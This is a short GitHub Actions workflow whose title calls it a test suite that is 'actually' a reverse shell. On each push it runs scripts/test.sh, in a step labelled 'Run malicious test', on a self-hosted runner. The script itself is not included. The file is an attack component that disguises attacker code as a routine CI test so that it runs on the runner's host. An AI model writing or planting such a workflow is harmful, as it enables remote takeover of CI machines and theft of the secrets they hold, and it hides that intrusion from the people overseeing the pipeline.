name: Run Test Suite (Actually Reverse Shell)

on: [push]

jobs:
  run-test:
    runs-on: self-hosted
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Run malicious test
        run: |
          chmod +x scripts/test.sh
          ./scripts/test.sh
